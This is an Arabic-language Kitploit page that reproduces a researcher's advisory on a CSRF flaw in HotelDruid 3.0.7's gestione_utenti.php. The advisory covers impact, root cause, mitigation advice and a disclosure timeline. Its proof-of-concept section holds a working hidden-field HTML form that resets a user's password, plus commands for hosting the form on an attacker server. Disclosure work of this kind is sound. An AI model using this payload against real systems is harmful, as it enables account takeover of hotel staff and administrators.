Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2525-25748-Cross-Site-Request-Forgery-CSRF-Vulnerability-in-HotelDruid-3.0.7 — ثغرة تزوير الطلب عبر المواقع (CSRF) في HotelDruid 3.0.7 (CVE-2025-25748) | Kitploit
أدوات/GitHubGitHub/huyvo2910/cve-2525-25748-cross-site-request-forgery-csrf-vulnerability-in-hoteldruid-3.0.7
تحليل الثغرات الأمنيةاستغلال تطبيقات الويبأمن الويباختبار الاختراقالأوراق والأبحاثالتعلم والتعليم
GitHubhuyvo2910/cve-2525-25748-cross-site-request-forgery-csrf-vulnerability-in-hoteldruid-3.0.7

CVE-2525-25748-Cross-Site-Request-Forgery-CSRF-Vulnerability-in-HotelDruid-3.0.7

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ثغرة تزوير الطلب عبر المواقع (CSRF) في HotelDruid 3.0.7 (CVE-2025-25748)

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

CVE-2025-25748-ثغرة-تزوير-الطلبات-عبر-المواقع-CSRF-في-HotelDruid-3.0.7

الوصف

ثغرة تزوير الطلبات عبر المواقع (CSRF) في نقطة النهاية gestione_utenti.php في HotelDruid 3.0.7 تسمح للمهاجمين بتنفيذ إجراءات غير مصرح بها (مثل تعديل كلمات مرور المستخدمين) نيابة عن المستخدمين المصادق عليهم من خلال استغلال عدم التحقق من المصدر أو المرجع وغياب رموز CSRF.


التأثير

  • تغييرات غير مصرح بها لكلمات المرور: يمكن للمهاجمين استبدال كلمات مرور المستخدمين، مما يؤدي إلى الاستيلاء الكامل على الحسابات.
  • ركوب الجلسة: يمكن للمهاجم استغلال الجلسة النشطة للضحية لإجراء تغييرات إدارية غير مصرح بها.
  • خطر اختراق البيانات: إذا تم اختراق الحسابات الإدارية، فقد يتم كشف أو تغيير البيانات الحساسة للمستخدمين والبيانات التشغيلية.

تكشف هذه الثغرة جميع حسابات المستخدمين — بما في ذلك الحسابات الإدارية — لتغييرات غير مصرح بها دون موافقة المستخدم.


إثبات المفهوم (PoC)

نموذج HTML لإثبات المفهوم

يوضح النموذج الضار التالي كيف يمكن للمهاجم إجبار مسؤول مسجل الدخول على تغيير كلمة مرور المستخدم ذي المعرف 2 إلى maliciouspassword:

root@kitploit:~
<form method="POST" action="http://localhost/hoteldruid/gestione_utenti.php">    <input type="hidden" name="anno" value="2025">    <input type="hidden" name="id_sessione" value="20250118062407or6tODG42f79QvMA2429">    <input type="hidden" name="modifica_pass" value="SI">    <input type="hidden" name="id_utente_pass" value="2">    <input type="hidden" name="prima_pass" value="maliciouspassword">    <input type="hidden" name="seconda_pass" value="maliciouspassword">    <button type="submit">Submit</button></form>

استضافة الهجوم وتشغيله

احفظ الكود أعلاه باسم csrf_attack.html.

اخدمه باستخدام بايثون (خادم يتحكم به المهاجم):

root@kitploit:~
python3 -m http.server 8080

وجّه الضحية إلى:

root@kitploit:~
http://<attacker-ip>:8080/csrf_attack.html

بمجرد الإرسال، يرسل النموذج الطلب إلى HotelDruid، لتغيير كلمة مرور المستخدم ذي المعرف 2 إلى maliciouspassword، باستخدام الجلسة النشطة للضحية.


التحليل

الخلفية

HotelDruid هو نظام إدارة ممتلكات مفتوح المصدر يستخدم على نطاق واسع للفنادق والإيجارات السياحية. باعتباره نظامًا متعدد المستخدمين مع ضوابط إدارية لإدارة المستخدمين، فإن ضمان أن المستخدمين المصرح لهم فقط هم من يمكنهم تعديل بيانات اعتماد الحسابات أمر بالغ الأهمية لأمن النظام بشكل عام.

تستغل ثغرات CSRF الثقة التي يضعها الخادم في جلسة متصفح المستخدم. إذا كان الضحية مسجلاً للدخول وزار صفحة ضارة، يمكن للصفحة إرسال طلبات غير مصرح بها بصمت إلى التطبيق الضعيف باستخدام الجلسة النشطة للضحية. في HotelDruid، يسمح نقص دفاعات CSRF في الإجراءات الحساسة — مثل تغيير كلمات مرور المستخدمين — للمهاجمين بالاستيلاء الكامل على الحسابات دون تفاعل المستخدم بخلاف زيارة رابط ضار.


تفاصيل الثغرة

نقطة النهاية المتأثرة

  • gestione_utenti.php

المعلمات المتأثرة

  • modifica_pass
  • id_utente_pass
  • prima_pass
  • seconda_pass

السبب الجذري

  • لا يوجد رمز لمكافحة CSRF في النموذج أو يتم التحقق منه من جانب الخادم.
  • لا يتم إجراء التحقق من رؤوس Origin أو Referer.
  • يثق التطبيق بشكل أعمى في طلبات POST الواردة، بما في ذلك تلك القادمة من مواقع خارجية.

سير الاستغلال

  1. يقوم المهاجم بإعداد نموذج HTML ضار يحتوي على حقول مخفية مملوءة مسبقًا تستهدف gestione_utenti.php.
  2. يخدع المهاجم مستخدمًا مسجلاً الدخول إلى HotelDruid (مثل مسؤول) لزيارة الصفحة الضارة.
  3. عند الزيارة، يتم إرسال النموذج تلقائيًا، مما يرسل طلبًا صالحًا لتغيير كلمة مرور المستخدم إلى قيمة يتحكم بها المهاجم.
  4. يتم استخدام جلسة الضحية لتفويض الطلب، دون علمه أو موافقته.

التأثير

  • الاستيلاء على الحساب: يمكن تغيير كلمة مرور أي مستخدم (بما في ذلك حسابات المسؤولين) دون علمه، مما يمنح المهاجم وصولاً كاملاً.
  • تصعيد الصلاحيات: يمكن للمهاجمين تصعيد الصلاحيات إذا تمكنوا أولاً من اختراق مستخدم ذي مستوى أقل ثم التنقل باستخدام الإجراءات الإدارية.
  • مخاطر سلامة البيانات: يمكن للمهاجمين تعديل حسابات المستخدمين، مما قد يؤدي إلى قفل المستخدمين الشرعيين أو إنشاء وصول خلفي.

التخفيف / التصحيح

توصيات للمطورين

رموز مكافحة CSRF

  • تنفيذ وفرض رموز فريدة لمكافحة CSRF لجميع النماذج والطلبات التي تغير الحالة.
  • التحقق من الرموز من جانب الخادم قبل معالجة الطلبات.

التحقق من رأس المرجع/المصدر

  • التحقق من رؤوس Referer و Origin لضمان أن الطلبات تأتي من مصادر موثوقة.

تقييد العمليات الحساسة عبر طلبات GET

  • يجب تقييد تغييرات كلمات المرور والإجراءات المماثلة على طلبات POST فقط.
  • تجنب تمرير بيانات الجلسة الحساسة (مثل id_sessione) في عنوان URL.

تحسينات إدارة الجلسات

  • إعادة توليد رموز الجلسة بعد تسجيل الدخول.
  • ربط رموز الجلسة بعناوين IP أو بصمات المتصفح، حيثما أمكن.

إعلام المستخدم

  • إعلام المستخدمين (بالبريد الإلكتروني أو تنبيه داخل التطبيق) عند حدوث إجراءات حساسة مثل تغيير كلمة المرور.

الجدول الزمني والائتمانات

  • تاريخ الاكتشاف: 16 يناير 2025
  • إخطار البائع: 17 يناير 2025
  • تعيين MITRE CVE: CVE-2025-25748، 27 فبراير 2025
  • الكشف العام: 7 مارس 2025
  • الباحث: Huy Vo (باحث أمني)
تنزيل الأداة